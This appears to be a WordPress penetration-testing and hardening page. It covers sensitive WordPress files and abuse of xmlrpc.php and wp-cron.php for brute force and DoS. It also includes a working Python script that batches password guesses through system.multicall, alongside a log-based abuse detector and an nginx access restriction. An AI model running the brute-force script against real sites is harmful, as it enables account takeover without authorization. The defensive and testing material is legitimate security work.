license.txt contains useful information such as the version of WordPress installed.
wp-activate.php is used for the email activation process when setting up a new WordPress site.
xmlrpc.php is a file that represents a feature of WordPress that enables data to be transmitted with HTTP acting as the transport mechanism and XML as the encoding mechanism. This type of communication has largely been replaced by the WordPress REST API, but the endpoint is still enabled by default.
wp-content folder is the main directory where plugins and themes are stored.
wp-content/uploads/ is the directory where any files uploaded to the platform are stored.
wp-config.php file contains information required by WordPress to connect to the database such as the database name, database host, username and password, authentication keys and salts, and the database table prefix. This configuration file can also be used to activate DEBUG mode, which can be useful in troubleshooting (and, if left on in production, leaks paths and query details in error output).
If xmlrpc.php is active you can use it to brute-force credentials or to launch DoS attacks against other resources through the pingback method. (This can be automated with existing tooling.)
Brute-forcing is faster with system.multicall, since you can try several credentials in a single request:
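The following is an added example of such a batched request and is not code from the original page. It builds one system.multicall body wrapping a wp.getUsersBlogs call per credential pair, then parses a constructed reply shaped like WordPress's multicall format (a one-element array per successful call, a faultCode/faultString struct per rejected one). The target URL, user names and passwords are placeholders. Caveat: newer WordPress versions stop authenticating after the first failed call inside a multicall, so a batch where every entry after the first fault also failed is inconclusive, not proof that those passwords are wrong.

```python
"""Added example: batching WordPress XML-RPC credential checks with
system.multicall. Not code from the original page; standard library only.
The URL, user names and passwords are placeholders for illustration."""
import urllib.request
import xmlrpc.client


def build_multicall(creds):
    """Wrap one wp.getUsersBlogs call per (user, password) pair in a single
    system.multicall request body. wp.getUsersBlogs needs no blog ID and
    authenticates before doing anything else, so it is a clean login probe."""
    calls = [
        {"methodName": "wp.getUsersBlogs", "params": [user, password]}
        for user, password in creds
    ]
    return xmlrpc.client.dumps((calls,), methodname="system.multicall").encode()


def parse_multicall_response(body, creds):
    """Return the (user, password) pairs whose call did not come back as a
    fault. Each multicall result is either a one-element list holding the
    call's return value or a struct carrying faultCode/faultString."""
    try:
        (results,), _ = xmlrpc.client.loads(body)
    except xmlrpc.client.Fault as exc:
        # A top-level fault means the whole multicall was rejected (for
        # example the method is disabled); nothing follows about credentials.
        raise RuntimeError(f"system.multicall rejected: {exc.faultString}") from exc
    accepted = []
    for (user, password), result in zip(creds, results):
        if isinstance(result, dict) and "faultCode" in result:
            continue  # rejected pair
        accepted.append((user, password))
    return accepted


def send_multicall(url, creds):
    """Network helper (not exercised offline): POST the batch and parse it."""
    creds = list(creds)
    req = urllib.request.Request(
        url, data=build_multicall(creds),
        headers={"Content-Type": "text/xml"}, method="POST")
    with urllib.request.urlopen(req, timeout=15) as resp:
        return parse_multicall_response(resp.read(), creds)


def constructed_response():
    """Constructed stand-in for a WordPress reply in which only the second
    credential pair was accepted, shaped like the real multicall format."""
    blog = {"isAdmin": True, "url": "http://wp.example/", "blogid": "1",
            "blogName": "wp.example", "xmlrpc": "http://wp.example/xmlrpc.php"}
    results = [
        {"faultCode": 403, "faultString": "Incorrect username or password."},
        [[blog]],  # wp.getUsersBlogs returns an array of blog structs
        {"faultCode": 403, "faultString": "Incorrect username or password."},
    ]
    return xmlrpc.client.dumps((results,), methodresponse=True).encode()


SAMPLE_CREDS = [("admin", "admin"), ("admin", "Winter2024!"), ("editor", "password")]

if __name__ == "__main__":
    print(build_multicall(SAMPLE_CREDS).decode())
    print(parse_multicall_response(constructed_response(), SAMPLE_CREDS))
```

Running it prints the XML body and `[('admin', 'Winter2024!')]` for the constructed reply; point `send_multicall("http://wp.example/xmlrpc.php", SAMPLE_CREDS)` at a host you are authorized to test to use it for real.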
See the use of system.multicall in the previous section to learn how to abuse this method to cause a DDoS.
/wp-cron.php: when this file is accessed a "heavy" MySQL query is performed, so it could be used by attackers to cause a DoS. Also, by default, wp-cron.php is called on every page load (any time a client requests any WordPress page), which on high-traffic sites can cause problems (DoS). Defining DISABLE_WP_CRON in wp-config.php and triggering wp-cron.php from a system cron job instead removes the per-request trigger.
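Added example, not from the original page: the detection side of the two abuses above. It parses combined-format access-log lines, counts hits per client and target (xmlrpc.php, wp-cron.php, wp-login.php) inside a sliding window, and flags sources that reach a threshold. The log lines are constructed; the window and threshold are assumptions to tune per site. Status codes are ignored on purpose, because a failed XML-RPC login is still answered with 200.

```python
"""Added example (not from the original page): flag sources hammering
wp-cron.php or brute-forcing xmlrpc.php / wp-login.php from access logs.
Log lines are constructed; window and threshold are assumptions."""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

# Apache/nginx "combined" log format, capturing only the fields we need.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
WATCHED = {"/xmlrpc.php", "/wp-cron.php", "/wp-login.php"}


def parse_line(line):
    """Return (ip, timestamp, method, path without query, status) or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return m["ip"], ts, m["method"], m["path"].split("?", 1)[0], int(m["status"])


def find_abusers(lines, window=timedelta(seconds=60), threshold=20):
    """Count hits per (ip, path) inside a sliding window; report the peak
    count for every pair that reaches the threshold. Volume is the signal:
    a rejected XML-RPC login still returns HTTP 200, so status is ignored."""
    recent = defaultdict(deque)
    flagged = {}
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ip, ts, _method, path, _status = parsed
        if path not in WATCHED:
            continue
        key = (ip, path)
        q = recent[key]
        q.append(ts)
        while ts - q[0] > window:  # drop hits that fell out of the window
            q.popleft()
        if len(q) >= threshold:
            flagged[key] = max(flagged.get(key, 0), len(q))
    return flagged


def sample_log():
    """Constructed lines: one source hits xmlrpc.php 25 times in 25 s,
    another touches wp-cron.php three times, plus ordinary traffic."""
    base = datetime(2024, 10, 10, 13, 55, 0, tzinfo=timezone.utc)
    fmt = '{ip} - - [{ts}] "{method} {path} HTTP/1.1" {status} 512'

    def line(ip, offset, method, path, status):
        ts = (base + timedelta(seconds=offset)).strftime("%d/%b/%Y:%H:%M:%S %z")
        return fmt.format(ip=ip, ts=ts, method=method, path=path, status=status)

    lines = [line("203.0.113.5", i, "POST", "/xmlrpc.php", 200) for i in range(25)]
    lines += [line("198.51.100.7", 10 * i, "GET", "/wp-cron.php?doing_wp_cron", 200)
              for i in range(3)]
    lines += [line("192.0.2.9", 5, "GET", "/", 200),
              line("192.0.2.9", 6, "GET", "/wp-content/uploads/a.png", 200)]
    return lines


if __name__ == "__main__":
    for (ip, path), hits in find_abusers(sample_log()).items():
        print(f"{ip} -> {path}: {hits} hits within 60 s")
```

Feed it a real file with `find_abusers(open("/var/log/nginx/access.log"))`; behind a reverse proxy, make sure the logged client address is the real one (X-Forwarded-For handling) or every flag will point at the proxy.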
Restrict access to the wp-admin directory and wp-login.php (there is no wp-admin.php file) so that they are only reachable internally or from certain IP addresses.
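One way to apply that restriction in nginx, as an added example that is not from the original page. The network range, admin IP and php-fpm socket path are placeholders. The ordering matters: an exact `location =` wins over everything, and the `^~` prefix stops a generic `location ~ \.php$` block from taking over for files under /wp-admin/, which would otherwise silently bypass the allow/deny rules.

```nginx
# Added example, not from the original page: limit WordPress admin entry
# points to an internal range and one admin host. CIDR, IP and socket path
# are placeholders.

# Exact match has top priority, so admin-ajax.php stays reachable for
# front-end plugins that call it without being logged in.
location = /wp-admin/admin-ajax.php {
    fastcgi_pass unix:/run/php/php-fpm.sock;
    include fastcgi_params;
    fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
}

location = /wp-login.php {
    allow 10.0.0.0/8;      # internal network
    allow 203.0.113.10;    # admin's static egress address
    deny all;              # everyone else receives 403
    fastcgi_pass unix:/run/php/php-fpm.sock;
    include fastcgi_params;
    fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
}

# ^~ prevents the site-wide "location ~ \.php$" from matching first;
# the nested regex location inherits allow/deny from this block.
location ^~ /wp-admin/ {
    allow 10.0.0.0/8;
    allow 203.0.113.10;
    deny all;
    location ~ \.php$ {
        fastcgi_pass unix:/run/php/php-fpm.sock;
        include fastcgi_params;
        fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
    }
}
```

Two caveats a practitioner should check: this does nothing for credential attacks through xmlrpc.php or the REST API, which must be restricted separately, and if nginx sits behind a load balancer the allow/deny rules evaluate the proxy's address unless the real client IP is restored (ngx_http_realip_module).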